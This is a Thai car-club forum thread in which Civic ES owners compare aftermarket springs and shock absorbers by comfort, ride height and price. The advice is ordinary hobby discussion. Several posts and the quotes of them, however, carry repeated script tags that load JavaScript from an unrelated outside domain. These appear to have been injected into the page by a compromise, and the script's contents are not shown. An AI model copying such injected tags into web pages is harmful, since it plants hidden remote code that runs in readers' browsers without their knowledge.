ตอบ
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 15 กรกฎา 2011 19:03 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
ผมลองค้นหาแล้วไม่เจอ เลยตั้งกระทู้ถามครับ

คือว่าจะเปลี่ยนแมกซ์เป็น 17 นิ้ว เลยคิดว่าต้องทำช่วงล่างด้วย เพื่อไม่ให้กระ้ด้างหรือให้นุ่มใกล้เคียงของเดิมมากที่สุด จะสอบถามว่าระหว่าง


- โช๊ค+สปริง DC5
- โช๊คเดิม+สปริง Tanabe NF210
- โช๊คเดิม+สปริง TEIN S-Tech
- โช๊คเดิม+สปริง H&R


อันไหนดูแล้วราคาไม่แรงและไม่กระด้างบ้างครับ (งบไม่ค่อยมีครับ)

เรื่องความสูง ผมกะไม่โหลดเตี้ยมากครับ สัก 1.5 นิ้ว ก็พอครับ


ขอบคุณครับ
ได้รับคำขอบคุณจาก: artbyayucity 
Alcapone


เข้าร่วม: 10 เมษา 2009
ตอบ: 280

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 315
ให้คำขอบคุณ: 183

ปี: 2004
ศุกร์, 15 กรกฎา 2011 21:28 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
รอผู้ รู้ ค้าบบบ

ได้รับคำขอบคุณจาก: artbyayucity 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 17 กรกฎา 2011 14:47 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
รอคำตอบครับ
CHAMP_ME16


ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 17 กรกฎา 2011 16:55 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
- โช๊ค+สปริง DC5 (ตัวนี้ผมลองแล้วครับหนึบดีเหมือนกันครับแต่กระด้างอ่ะครับ)
- โช๊คเดิม+สปริง Tanabe NF210 (ไม่เคยครับรอผู้รู้ท่านอื่นน่ะครับ)
- โช๊คเดิม+สปริง TEIN S-Tech ( ผมใช้ตัวนี้อยู่ครับแต่ผมเลื่อนเบ้าสุดอัดน้ำมันใหม่น่ะครับ ผบ.ไม่บ่นด้วยครับ)
- โช๊คเดิม+สปริง H&R (เพื่อนที่ทำงานใช้อยู่ครับแต่จับคู่กับ koni ครับ)
ตัวที่ใกล้เคียงของเดิมน่าจะเป็น H&R กับ S-Tech น่ะครับ
ถ้าผมจำไม่ผิด H&R จะเตี้ยกว่า S-TECH น่ะครับ
ปล.ความเห็นส่วนตัวน่ะครับ
ได้รับคำขอบคุณจาก: NuuTeee  yoyosonic  nooduean_69  nu_es_05 
moonoy


เข้าร่วม: 19 กรกฎา 2009
ตอบ: 1153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1364
ให้คำขอบคุณ: 926

ที่อยู่: Samutprakarn
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 18 กรกฎา 2011 10:20 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
โช๊ค+สปริง DC5 ==> ลงน้อยประมาณ 1" แต่แข็งและหนึบกว่า
- โช๊คเดิม+สปริง Tanabe NF210 ==> ลงประมาณ 1.5" มั้งครับ ตูดห้อยหน่อย NF (Normal Feeling) ใกล้เคียงสปริงเดิม
- โช๊คเดิม+สปริง TEIN S-Tech==> ลงประมาณ 1.5" หน้าทิ่มตูดโด่งนิดนึง ผมใช้อยู่ใกล้เคียงของเดิม ไม่แข็ง
- โช๊คเดิม+สปริง H&R ==> ไม่เคยลอง แต่เห็นเพื่อน ๆ ว่าลง 2 นิ้ว ล้ออม ๆ สวย ๆ Felling ไม่ทราบครับ แต่เห็นหลาย ๆ คนใช้อยู่
ที่ว่ามาทั้งหมดหมายถึงเอาโช้คเดิมอัดน้ำมันนะครับ


ราคา ==> ถูกสุดน่าจะเป็น DC5 ครับ พันปลาย ๆ HR ประมาณ 3 กลาง ๆ ถึง 4
Tanabe กับ Tein หามือสองยากนิดนึง ราคาประมาณ 4 พันอ่ะครับ
ทั้งหมดหาได้ตามห้องซื้อขาย
ได้รับคำขอบคุณจาก: NuuTeee  bangnum  yoyosonic  nooduean_69  nu_es_05 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 18 กรกฎา 2011 12:04 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
ถ้าโ๊ช๊คเดิมอัดน้ำมัน ใส่สปริง DC5 จะเด้งเยอะัรึเปล่าครับ

เพราะหา TEIN กับ Tanabe มือสองไม่ได้เลยครับ
CHAMP_ME16


ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 18 กรกฎา 2011 12:57 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
NuuTeee พิมพ์ว่า:
ถ้าโ๊ช๊คเดิมอัดน้ำมัน ใส่สปริง DC5 จะเด้งเยอะัรึเปล่าครับ

เพราะหา TEIN กับ Tanabe มือสองไม่ได้เลยครับ



เด้งเยอะอยู่ครับ ค่อยๆหาไปครับเดี๋ยวก็มีมาครับ ตอนนี้เห็น H&R มา3500บาท อ่ะครับ ลองดูครับ
ได้รับคำขอบคุณจาก: NuuTeee 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 18 กรกฎา 2011 15:05 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
ขอบคุณคุณแชมป์สำหรับข้อมูลครับ
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 18 กรกฎา 2011 17:36 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
เห็นว่า โช้ค dc5 พอติดมาชอบมีเสียง กรึ้กๆๆ ท้ายรถเห็นเป็นหลายคันแล้วรวมทั้งรถผมด้วย
ได้รับคำขอบคุณจาก: NuuTeee  sol_es 
CHAMP_ME16


ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 18 กรกฎา 2011 18:09 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
NuuTeee พิมพ์ว่า:
ขอบคุณคุณแชมป์สำหรับข้อมูลครับ



ไม่เป็นไรครับ es เหมือนกันครับ ตอนนี้เห็นมีคนปล่อย โช๊ค 03 + S-Tech อ่ะครับลองโทรไปถามรายละเอียดดูครับ
ได้รับคำขอบคุณจาก: NuuTeee 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 18 กรกฎา 2011 19:22 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
พี่แชมป์ทำโช๊คที่ไหนหรอครับ ถ้าอัดน้ำมันนี่ อายุการใช้งานจะเกิน1ปี-2ปีไหมครับ
summary


เข้าร่วม: 21 พฤศจิกา 2009
ตอบ: 327

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 165
ให้คำขอบคุณ: 22

ปี: 2004
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 18 กรกฎา 2011 21:19 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
moonoy พิมพ์ว่า:
โช๊ค+สปริง DC5 ==> ลงน้อยประมาณ 1" แต่แข็งและหนึบกว่า
- โช๊คเดิม+สปริง Tanabe NF210 ==> ลงประมาณ 1.5" มั้งครับ ตูดห้อยหน่อย NF (Normal Feeling) ใกล้เคียงสปริงเดิม
- โช๊คเดิม+สปริง TEIN S-Tech==> ลงประมาณ 1.5" หน้าทิ่มตูดโด่งนิดนึง ผมใช้อยู่ใกล้เคียงของเดิม ไม่แข็ง
- โช๊คเดิม+สปริง H&R ==> ไม่เคยลอง แต่เห็นเพื่อน ๆ ว่าลง 2 นิ้ว ล้ออม ๆ สวย ๆ Felling ไม่ทราบครับ แต่เห็นหลาย ๆ คนใช้อยู่
ที่ว่ามาทั้งหมดหมายถึงเอาโช้คเดิมอัดน้ำมันนะครับ


ราคา ==> ถูกสุดน่าจะเป็น DC5 ครับ พันปลาย ๆ HR ประมาณ 3 กลาง ๆ ถึง 4
Tanabe กับ Tein หามือสองยากนิดนึง ราคาประมาณ 4 พันอ่ะครับ
ทั้งหมดหาได้ตามห้องซื้อขาย


ขอถามนิดนึงครับ ด้วยความเคารพ(ไม่ได้กวนนะครับสงสัยจริงๆ)
1 โช๊คเดิม+สปริง Tanabe NF210 ==> ลงประมาณ 1.5" ตูดห้อย
2 โช๊คเดิม+สปริง TEIN S-Tech==> ลงประมาณ 1.5" หน้าทิ่มตูดโด่งนิดนึง
คือทั้งสองตัวเลือกล้วนลงมา 1.5" แต่อันนึงตูดห้อย อีกอันหน้าทิ่ม แสดงว่าหน้าหลังมันลงมาไม่เท่ากันใช้ไหมครับ
อย่างนี้เรา mix and mach ได้ไหม่ครับ
ได้รับคำขอบคุณจาก: NuuTeee 
catsteal


ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

ที่อยู่: เชียงใหม่-กรุงเทพ
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 18 กรกฎา 2011 21:32 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
+ทำสตั๊ดปรับเกลียวเลยคับ ปรับสูงต่ำได้สบาย
CHAMP_ME16


ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 19 กรกฎา 2011 08:08 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
benzd พิมพ์ว่า:
พี่แชมป์ทำโช๊คที่ไหนหรอครับ ถ้าอัดน้ำมันนี่ อายุการใช้งานจะเกิน1ปี-2ปีไหมครับ



ร้านประจำคลับเราครับ พี่ใหม่พรเทพครับ งานดีบริการเยี่ยมครับ
ส่วนอายุการใช้งานขึ้นอยู่กับการใช้รถของเราครับ
แต่ 1-2 ปี น่าจะได้น่ะครับ ผมไม่แน่ใจเหมือนกันครับ
ปล.ความเห็นส่วนตัวน่ะครับ
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
อังคาร, 19 กรกฎา 2011 10:11 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
summary พิมพ์ว่า:
moonoy พิมพ์ว่า:
โช๊ค+สปริง DC5 ==> ลงน้อยประมาณ 1" แต่แข็งและหนึบกว่า
- โช๊คเดิม+สปริง Tanabe NF210 ==> ลงประมาณ 1.5" มั้งครับ ตูดห้อยหน่อย NF (Normal Feeling) ใกล้เคียงสปริงเดิม
- โช๊คเดิม+สปริง TEIN S-Tech==> ลงประมาณ 1.5" หน้าทิ่มตูดโด่งนิดนึง ผมใช้อยู่ใกล้เคียงของเดิม ไม่แข็ง
- โช๊คเดิม+สปริง H&R ==> ไม่เคยลอง แต่เห็นเพื่อน ๆ ว่าลง 2 นิ้ว ล้ออม ๆ สวย ๆ Felling ไม่ทราบครับ แต่เห็นหลาย ๆ คนใช้อยู่
ที่ว่ามาทั้งหมดหมายถึงเอาโช้คเดิมอัดน้ำมันนะครับ


ราคา ==> ถูกสุดน่าจะเป็น DC5 ครับ พันปลาย ๆ HR ประมาณ 3 กลาง ๆ ถึง 4
Tanabe กับ Tein หามือสองยากนิดนึง ราคาประมาณ 4 พันอ่ะครับ
ทั้งหมดหาได้ตามห้องซื้อขาย


ขอถามนิดนึงครับ ด้วยความเคารพ(ไม่ได้กวนนะครับสงสัยจริงๆ)
1 โช๊คเดิม+สปริง Tanabe NF210 ==> ลงประมาณ 1.5" ตูดห้อย
2 โช๊คเดิม+สปริง TEIN S-Tech==> ลงประมาณ 1.5" หน้าทิ่มตูดโด่งนิดนึง
คือทั้งสองตัวเลือกล้วนลงมา 1.5" แต่อันนึงตูดห้อย อีกอันหน้าทิ่ม แสดงว่าหน้าหลังมันลงมาไม่เท่ากันใช้ไหมครับ
อย่างนี้เรา mix and mach ได้ไหม่ครับ


http://www.civicesgroup.com/forum/topic29355
http://www.civicesgroup.com/forum/topic28993
http://www.civicesgroup.com/forum/topic27402

โช้คเดิม+สปริงโหลด ผมว่าห้อยทุกยี่ห้อ แต่จะห้อยมากห้อยน้อยเท่านั้นเอง แต่ NF210 ห้อยเยอะจริงๆ เพราะตามสเปคมันก็ หน้าลง 25-35 หลังลง 35-40 มม (ข้างกล่องโดยประมาณ จำไม่ค่อยได้)
ได้รับคำขอบคุณจาก: Phetcharat  moonoy  summary  NuuTeee  yoyosonic  nu_es_05 
moonoy


เข้าร่วม: 19 กรกฎา 2009
ตอบ: 1153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1364
ให้คำขอบคุณ: 926

ที่อยู่: Samutprakarn
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 19 กรกฎา 2011 13:06 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
Ton- พิมพ์ว่า:
summary พิมพ์ว่า:
moonoy พิมพ์ว่า:
โช๊ค+สปริง DC5 ==> ลงน้อยประมาณ 1" แต่แข็งและหนึบกว่า
- โช๊คเดิม+สปริง Tanabe NF210 ==> ลงประมาณ 1.5" มั้งครับ ตูดห้อยหน่อย NF (Normal Feeling) ใกล้เคียงสปริงเดิม
- โช๊คเดิม+สปริง TEIN S-Tech==> ลงประมาณ 1.5" หน้าทิ่มตูดโด่งนิดนึง ผมใช้อยู่ใกล้เคียงของเดิม ไม่แข็ง
- โช๊คเดิม+สปริง H&R ==> ไม่เคยลอง แต่เห็นเพื่อน ๆ ว่าลง 2 นิ้ว ล้ออม ๆ สวย ๆ Felling ไม่ทราบครับ แต่เห็นหลาย ๆ คนใช้อยู่
ที่ว่ามาทั้งหมดหมายถึงเอาโช้คเดิมอัดน้ำมันนะครับ


ราคา ==> ถูกสุดน่าจะเป็น DC5 ครับ พันปลาย ๆ HR ประมาณ 3 กลาง ๆ ถึง 4
Tanabe กับ Tein หามือสองยากนิดนึง ราคาประมาณ 4 พันอ่ะครับ
ทั้งหมดหาได้ตามห้องซื้อขาย


ขอถามนิดนึงครับ ด้วยความเคารพ(ไม่ได้กวนนะครับสงสัยจริงๆ)
1 โช๊คเดิม+สปริง Tanabe NF210 ==> ลงประมาณ 1.5" ตูดห้อย
2 โช๊คเดิม+สปริง TEIN S-Tech==> ลงประมาณ 1.5" หน้าทิ่มตูดโด่งนิดนึง
คือทั้งสองตัวเลือกล้วนลงมา 1.5" แต่อันนึงตูดห้อย อีกอันหน้าทิ่ม แสดงว่าหน้าหลังมันลงมาไม่เท่ากันใช้ไหมครับ
อย่างนี้เรา mix and mach ได้ไหม่ครับ


http://www.civicesgroup.com/forum/topic29355
http://www.civicesgroup.com/forum/topic28993
http://www.civicesgroup.com/forum/topic27402

โช้คเดิม+สปริงโหลด ผมว่าห้อยทุกยี่ห้อ แต่จะห้อยมากห้อยน้อยเท่านั้นเอง แต่ NF210 ห้อยเยอะจริงๆ เพราะตามสเปคมันก็ หน้าลง 25-35 หลังลง 35-40 มม (ข้างกล่องโดยประมาณ จำไม่ค่อยได้)


ใช่ครับ หน้าหลังลงไม่เท่ากัน แล้วแต่ยี่ห้อ
Mix and match อาจจะทำได้ครับ แต่ผมว่าลำพังหามาเป็น Set ก็ยากอยู่แล้ว เล่นหามาทีละ 2 หน้า 2 หลัง 2 หายากกว่านะ
เลือกเอายี่ใดยี่ห้อหนึ่ง แล้วจัดการเลื่อนเบ้าลง หรือรองสเปเซอร์เอา มีหลายวิธีบอกร้านเลยว่าจะเอาลงขนาดไหน ? เขาจัดให้ได้ครับ
ได้รับคำขอบคุณจาก: summary  NuuTeee  Ton-  nu_es_05  tukkang 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 20 กรกฎา 2011 10:25 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
ตอนนี้มีคนปล่อยสปริง DC5 ราคา 3000 ครับ => ผมคิดว่าราคาแรงอยู่เหมือนกัน

ถ้าเอาสปริง DC5 แล้วใช้โช๊คเดิมอัดน้ำมัน จะเด้งมากหรือไม่ครับ ผมอยากได้นุ่ม ๆ ใกล้ของเดิมอ่ะครับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
พุธ, 20 กรกฎา 2011 10:40 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
ตัวเลือกที่ 3 ครับ ^^ อัดน้ำมันใหม่ เลือนเป้าหน้าสุด แล้ว ก็ รองหลังขึ้นมา อีก ครึ่งนิ่ว หล่อ

อย่าง แรง ขับง่ายด้วยครับ เตี้ยกำลังสวย
ได้รับคำขอบคุณจาก: NuuTeee 
NeaT ES.


เข้าร่วม: 10 ตุลา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4530
ให้คำขอบคุณ: 1984

ที่อยู่: คนดีไม่มี
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 20 กรกฎา 2011 11:03 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
NuuTeee พิมพ์ว่า:
ตอนนี้มีคนปล่อยสปริง DC5 ราคา 3000 ครับ => ผมคิดว่าราคาแรงอยู่เหมือนกัน

ถ้าเอาสปริง DC5 แล้วใช้โช๊คเดิมอัดน้ำมัน จะเด้งมากหรือไม่ครับ ผมอยากได้นุ่ม ๆ ใกล้ของเดิมอ่ะครับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">



เด้งแน่นอนคราบ ถึงอัดน้ำมันใหม่ก็จับสปริงไม่อยู่ครับผม หา Tein ครับตอบโจทย์ได้ตรงสุดแล้ว
ได้รับคำขอบคุณจาก: NuuTeee 
CHAMP_ME16


ชื่อเล่น: แชมป์

เข้าร่วม: 11 กันยา 2009
ตอบ: 3113

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2265
ให้คำขอบคุณ: 891

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 20 กรกฎา 2011 11:04 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
NuuTeee พิมพ์ว่า:
ตอนนี้มีคนปล่อยสปริง DC5 ราคา 3000 ครับ => ผมคิดว่าราคาแรงอยู่เหมือนกัน

ถ้าเอาสปริง DC5 แล้วใช้โช๊คเดิมอัดน้ำมัน จะเด้งมากหรือไม่ครับ ผมอยากได้นุ่ม ๆ ใกล้ของเดิมอ่ะครับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


ไม่รู้ว่าแพงหรือเปล่าครับ ตอนผมปล่อยไป 1500 หรือ 1800 จำไม่ได้ครับ
เด้งแน่นอนครับ
ปล.แต่ว่าถ้าอยากจะลองดูก่อนก็ได้ครับ เพื่อเป็นประสบการณ์ครับ
ได้รับคำขอบคุณจาก: NuuTeee 
nosleepclub


ชื่อเล่น: ปิงปิง

เข้าร่วม: 20 ธันวา 2010
ตอบ: 357

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 663
ให้คำขอบคุณ: 506

ที่อยู่: พระราม2
ปี: 2002
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 20 กรกฎา 2011 11:38 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
เชียร์ สปริง เทอิ้นอีกคนครับ ใส่อยู่ ไม่เด้ง ไม่แข๊ง เกินไป
ได้รับคำขอบคุณจาก: NuuTeee 
NuuTeee


ชื่อเล่น: ตี่

เข้าร่วม: 09 พฤษภาคม 2010
ตอบ: 1198

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1485
ให้คำขอบคุณ: 2146

ที่อยู่: บางใหญ่
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 20 กรกฎา 2011 11:41 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
แบบนี้คงเหลือตัวเลือกแค่ Tanabe NF210 กับ Tein S-Tech แล้ว

แต่หามือ 2 ยากจริง ๆ ครับ ราคามือ 1 ก็แรงอยู่ครับ
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
พุธ, 20 กรกฎา 2011 12:58 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
TEIN ฮ่าๆๆ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: NuuTeee 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 16 ตุลา 2011 22:42 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
มาเก็บความรู้คับ
ขอบคุณกระทู้ดีๆ และพี่ๆสุดเจ๋งคับ
Nung_Sodapop


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

ที่อยู่: ลาดกระบัง
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 14 พฤศจิกา 2011 18:51 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
ถามครับ ??

ถ้าผมใส่สปริง H&R + โช๊คเดิมอัดน้ำมัน

แล้วต่อมา....

ผมจะเอาสปริง H&R ตัวเดิมที่เคยใส่กะโช๊คเดิมอัดน้ำมัน เอามาใส่กะโช๊ค DC5 ได้มั้ยครับ ??
silverqoo


เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 323

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 10
จันทร์, 14 พฤศจิกา 2011 20:05 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
ผม สปริง H&R+โช๊คเดิมอัดน้ำมัน+รองสเปเซอร์หลัง 1/2 นิ้วครับ

Feeling เด้งมากมายครับ เพิ่งอัดใหม่รอบสองที่ร้านที่ใหม่ไป เพราะว่าครั้งแรก เอาสปริงไม่อยู่
เลยไปอัดใหม่ ตอนนี้ ก็ยังเด้งครับ

คงไม่ไปอัดใหม่แล้ว คงต้องหาโช๊คแต่ง ยกชุดลองดู ให้รู้แล้วรู้รอดไปเลยครับ
เพราะว่าตอนนี้ขับ แล้วเหนื่อยมาก มันเด้ง

ความเห็นส่วนตัวน่ะครับ ขอเป็นอีกแนว ความคิดแล้วกันครับบบบ
ได้รับคำขอบคุณจาก: Nung_Sodapop  ozone 
nu_es_05


ชื่อเล่น: นุ

เข้าร่วม: 10 มิถุนา 2010
ตอบ: 1555

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1058
ให้คำขอบคุณ: 5949

ที่อยู่: สุขุมวิท 101/1
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 14 พฤศจิกา 2011 20:24 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
tein ss เลยคับจบเลย
ได้รับคำขอบคุณจาก: Nung_Sodapop  Ton- 
นุ_ES


ชื่อเล่น: นุ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 267

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 288
ให้คำขอบคุณ: 813

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 14 พฤศจิกา 2011 20:54 - ++สอบถามเรื่องโช๊ค+สปริง DC5 VS โช๊คเดิม+สปริง??++
เพิ่มเติมนิดหน่อยนะครับจากประสบการณ์ที่เคยใช้งานมา
- โช๊คเดิม + สปริงแต่งยังงัยก้อต้องอัดน้ำมัน ซึ่งจะอยู่ได้ประมาณ 1 ปี +/-
- โช๊คเดิมอัดน้ำมัน + สปริง DC5 เอาไม่อยู่หลังเด้งมากแม้จะเป็น DC5 TYPE S
- โช๊ค DC5 TYPE S นุ่มกว่า TYPE R แต่อย่างไรก้อตามถ้าใช้โช๊ค DC5 ต้องเปลี่ยนลูกหมาก
- ถ้าหาโช๊ค EP3 ได้จบไม่ต้องเปลี่ยนลูกหมาก
มาว่าเรื่องสปริงกันบ้าง
H&R กับ TANABE ลงมาเกือบ 2 นิ้ว ส่วนตัวผมว่า H&R เด้งกว่า TANABE
แต่ TANABE ท้ายห้อย ซึี่๋ง TANABE มี NF กะ DF จะเตีียกว่า
TEIN ลงประมาณ 1.5 นิ้ว หน้าิทิ่มตูดโด่งนิดนึงกระด้างกว่า TANABE

เคยใช้ - โช๊คเดิมอัดน้ำมัน + สปริง TEIN อัดน้ำมันประมาณปีละ 1 ครั้ง กระด้างนิดๆ ขับสนุก
ปัจจุบัน - โช๊ค DC5 TYPE S + สปริงหน้า H&R หลัง RSR รองสเปเซอร์ 1 นิ้ว นุ่มกว่าข้างบนแต่ก็ยังเด้งบ้าง

ลองพิจารณาดูละกันครับ ถ้าหา EP3 ได้น่าจะแจ่ม


แก้ไขล่าสุดโดย เมื่อ อังคาร, 15 พฤศจิกา 2011 19:13, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: Nung_Sodapop  Ton-  yoyosonic  nooduean_69  nu_es_05 
Nung_Sodapop


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

